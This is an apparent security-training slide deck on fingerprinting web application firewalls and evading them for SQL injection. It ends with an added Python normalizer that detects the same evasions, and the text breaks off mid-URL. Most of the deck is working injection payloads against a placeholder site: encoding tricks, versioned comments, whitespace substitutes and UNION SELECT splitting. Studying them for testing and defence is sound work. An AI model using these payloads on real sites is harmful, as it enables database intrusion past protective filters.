WAF Bypassing Techniques

Date posted: 16-Jan-2017
Category: Education



Avinash Kumar Thapa
  • Senior Security Analyst at Network Intelligence India
  • Bug hunter on HackerOne
  • CTF author on Vulnhub.com
  • Some exploits and PoCs on Exploit-DB as well
  • Passionate about web application security and exploit writing

Agenda
  • Introduction to Web Application Firewalls
  • Operation Modes
  • Vendors
  • Fingerprinting WAF
  • Ways to Bypass WAFs
  • Practical Cases for Bypassing
  • Conclusion

Introduction to Web Application Firewalls
  • Operates at the application layer.
  • Monitors all HTTP/HTTPS/SOAP/XML-RPC web service traffic between clients and servers, based on pre-defined signatures held in a database.
  • The basic goal of a WAF is to monitor and block content that violates a pre-defined policy. These pre-defined policies are patterns of user input that end up in a potential attack.
  • Understands HTTP and HTTPS traffic better than any traditional firewall.


Types of Operation Modes

Negative Model
A negative security model recognizes attacks by relying on a database of expected attack signatures.
Example: do not allow, in any page, any argument value (user input) that matches potential XSS strings like String.fromCharCode, etc.
Pros: Less time to implement.
Cons: Less protection.

Positive Model
A positive security model enforces positive behaviour by learning the application logic and then building a security policy of valid known requests as a user interacts with the application.
Example: on page news.jsp, the field id may only accept the characters [0-9], with values starting at 0 and going up to 65535. Using intval conditions on the page (accepts only integers).
Pros: Better performance (fewer rules). Fewer false positives.
Cons: Much more time to implement. Some vendors provide an automatic learning mode; it helps, but is far from perfect. In the end, you always need a skilled human to review the policies.

Mixed Model
A combination of both the positive and negative models.

Testing Environments
  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser

Products
  • F5 BIG-IP WAF
  • Sucuri
  • ModSecurity
  • Imperva Incapsula
  • PHP-IDS (PHP Intrusion Detection System)
  • Quick Defense
  • AQTRONIX WebKnight (for IIS, based on ISAPI filters)
  • Barracuda WAF

ISAPI filters are DLLs used to extend the functionality of the IIS server. They are only available on IIS servers.

Fingerprinting WAF
  • Citrix NetScaler WAF: adds a cookie to the HTTP communication. (Screenshot in the original slides.)
  • F5 BIG-IP ASM. (Screenshot in the original slides.)
  • On the basis of the HTTP response: other WAFs may be detected by the type of HTTP response received when submitting a malicious request; the response varies from one WAF to another. Some of the common responses are 403, 406, 419, 500, 501, etc.
  • Response for F5 BIG-IP. (Screenshot in the original slides.)
  • Request and response for the ModSecurity firewall. (Request and response screenshots in the original slides.)
  • Response for the WebKnight firewall, and the same response as rendered in the browser. (Screenshots in the original slides.)

Automatic Fingerprinting of WAFs

Using Nmap scripts:

nmap -p80 --script http-waf-detect

Using wafw00f:

python wafw00f.py url

Techniques to Bypass WAFs
  • Bypassing WAF for SQL injection vulnerabilities
  • Bypassing WAF for XSS issues
  • Bypassing WAF for LFI and RFI vulnerabilities

General Techniques to Bypass WAF
  • Null character injection
  • Mixed case
  • Inline comments
  • Chunked requests
  • Buffer overflow
  • HTTP parameter pollution
  • URL encoding
  • Keyword splitting
  • Replaced keywords
  • Ignoring cookies
  • Using data URIs
  • Header injection

Bypassing WAF For SQL Injection Vulnerabilities

Example 1 (without WAF)
https://abc.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (with WAF)
https://abc.com/index.php?id=1'
HTTP/1.1 403 Forbidden
or HTTP/1.1 406 Not Acceptable
or HTTP/1.1 404 Not Found
or HTTP/1.1 500 Internal Server Error
or HTTP/1.1 400 Bad Request

Some recon on the WAF: came to know that ModSecurity is in action.

https://abc.com/index.php?id=1
HTTP/1.1 200 OK

https://abc.com/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

This technique is URL encoding. Sometimes you need to use:
  • Double URL encoding: %2527 (decodes to %27, then to ')
  • Triple URL encoding: %252527 (decodes to %2527, then %27, then '); this is a very rare case

https://abc.com/index.php?id=1%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
  • Is the ORDER keyword blocked?
  • Is the ORDER BY keyword blocked?
  • Is there any other alternative to the ORDER BY query?
  • Are spaces blocked?
Let's try.

https://abc.com/index.php?id=1%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumption in mind: the ORDER keyword is blocked. Check again whether ORDER is blocked:

https://abc.com/index.php?id=1%27ORDER%23
HTTP/1.1 200 OK
New assumption in mind: the ORDER keyword is not blocked. What is blocked then? SPACES ARE BLOCKED.

https://abc.com/index.php?id=1%27 ORDER by 1 %23
HTTP/1.1 403 Forbidden

https://abc.com/index.php?id=1%27ORDERby1%23
HTTP/1.1 200 OK
No assumptions in mind, because only spaces are blocked.

Techniques to bypass spaces
  • Using + instead of a space, like order+by+1 (mostly blocked)
  • Using inline comments (/**/) instead of spaces, like order/**/by/**/1
  • Using a combination of inline comments and URL encoding instead of spaces, like:
    Order/%2a%2a/by/%2a%2a/1
    Order%2f**%2fby%2f**%2f1
  • Using a combination of inline comments, URL encoding and junk characters instead of spaces, like:
    Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
    Order%2f*JUNKCHARACTERS*%2fby%2f*JUNKCHARACTERS*%2f1
  • Using white space characters %0a, %0b, %0c, %0d, %a0, %09, %01. The query will be:
    ORDER%0aby%0a1
    ORDER%0bby%0b1
    ORDER%0cby%0c1
    ORDER%0Dby%0D1
    ORDER%A0by%A01
    ORDER%0D%0Aby%0D%0A1

https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK

Let's suppose the number of columns is 3.

https://abc.com/index.php?id=1%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumption in mind: are spaces blocked?

https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind: spaces were bypassed using inline comments, and it is still blocked. So:
  • Is the UNION keyword blocked?
  • Is the SELECT keyword blocked?
  • Are integers blocked?
  • Are commas blocked?
  • Is the combination UNION SELECT blocked?
  • Is SELECT with integers blocked?

Techniques to Bypass
  • Using inline (versioned) comments:
    /*!50000UNION*/
    /*!40000UNION*/
    /*!00000UNION*/
  • If UNION is blocked, using URL encoding techniques:
    %55nion (URL encoding of the first character)
    %2555nion (double URL encoding)
    %55%4e%49%4f%4e (UNION, every character URL encoded)
    Triple URL encoding

https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
  • Is the UNION keyword blocked?
  • Is the SELECT keyword blocked?
  • Are integers blocked?
  • Are commas blocked?
  • Is the combination UNION SELECT blocked?
  • Is SELECT with integers blocked?

https://abc.com/index.php?id=1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
  • Is the UNION keyword blocked?
  • Is the SELECT keyword blocked?
  • Are integers blocked?
  • Are commas blocked?
  • Is the combination UNION SELECT blocked?
  • Is SELECT with integers blocked?

https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK

https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK

Assumptions in mind:
  • The UNION keyword is NOT blocked.
  • The SELECT keyword is NOT blocked.
  • Integers are NOT blocked.
  • Commas are NOT blocked.
  • Is the combination UNION SELECT blocked?
  • SELECT with integers is NOT blocked.

Techniques to bypass the combination of UNION SELECT
  • Using a combination of inline comments and URL encoding:
    /*!50000%55niOn*/ /*!50000%53eLECT*/
  • Using white space characters and the URL encoding of the comment character (#):
    Union%23%0aSELECT
    Union%23%0bSELECT
    Union%23%0cSELECT
    Union%23%0DSELECT
    Union%23%A0SELECT

Techniques to bypass the combination of UNION SELECT
  • Using buffer overflow (junk padding inside a # comment, so that the second keyword sits beyond what the WAF inspects):
    UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
    Sometimes the junk needs to be increased as per the requirement:
    UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT
  • Using the DISTINCT statement: UNION DISTINCT SELECT
  • Using the DISTINCTROW statement: UNION DISTINCTROW SELECT
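Every evasion in the space, inline-comment, URL-encoding, #-padding and DISTINCTROW sections above works because the rule matches the raw parameter while MySQL parses a different string. The following Python example is added here and is not from the slides: it canonicalizes a query-string value the way MySQL effectively reads it (repeated URL decoding, /*!...*/ contents kept, other comments and the listed whitespace substitutes turned into one space) before matching, and compares that against a raw-keyword rule over sample values constructed from the slides' payloads.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample parameter values, built from the payload forms shown in the slides
SAMPLES = {
    "plain":             "1' ORDER BY 1#",
    "inline_comments":   "1%27/**/ORDER/**/by/**/1%23",
    "whitespace_chars":  "1%27ORDER%0aby%a01%23",
    "versioned_comment": "1%27/**//*!50000%55niOn*//**//*!50000%53eLECT*//**/1,2,3%23",
    "double_encoded":    "1%2527%2520ORDER%2520BY%25201%2523",
    "hash_newline":      "1%27/**/UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT/**/1,2,3%23",
    "distinctrow":       "1%27/**/UNION/**/DISTINCTROW/**/SELECT/**/1,2,3%23",
    "benign":            "42",
}

# Signatures are matched against the canonical form, so they can stay simple
PATTERNS = [
    re.compile(r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s+select\b"),
    re.compile(r"\border\s+by\b"),
]

def decode_url(value, max_rounds=3):
    """URL-decode repeatedly: the slides use single, double and triple encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value, encoding="latin-1")  # latin-1 keeps %a0 as one character
        if decoded == value:
            break
        value = decoded
    return value

def normalize_sql(value):
    """Rewrite the value into the form MySQL effectively parses."""
    s = decode_url(value)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL executes /*!50000 ... */ content
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # plain inline comments act as separators
    s = re.sub(r"#[^\n]*", " ", s)                           # '#' comments run only to end of line
    s = re.sub(r"[\x01\x09-\x0d\xa0 ]+", " ", s)             # the space substitutes listed in the slides
    return s.lower().strip()

def naive_match(value):
    """A literal-keyword rule applied to the raw value: the kind of rule the slides defeat."""
    return any(p.search(value.lower()) for p in PATTERNS)

def normalized_match(value):
    return any(p.search(normalize_sql(value)) for p in PATTERNS)

def compare_rules():
    """Return {sample name: (raw rule hit, normalized rule hit)} for every sample."""
    return {n: (naive_match(v), normalized_match(v)) for n, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (raw_hit, norm_hit) in compare_rules().items():
        print(f"{name:18} raw={raw_hit!s:5} normalized={norm_hit!s:5} -> {normalize_sql(SAMPLES[name])}")
```

Only the plain sample trips the raw rule; every evasion form from the slides is caught once the value is normalized first, which is why mature engines canonicalize input before signature matching.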

https://abc.com/index.php?id=1%27/**/UNION%23XXXXXXXXXXXXXXXXXXXXX